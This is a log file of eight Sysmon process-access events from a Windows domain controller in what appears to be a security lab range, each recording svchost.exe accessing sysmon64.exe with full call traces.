{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1360,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.142\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.142","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1361,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.142\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.142","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1362,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.142\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.142","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1363,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.142\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.142","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1364,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.142\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.142","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1365,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1366,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1367,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
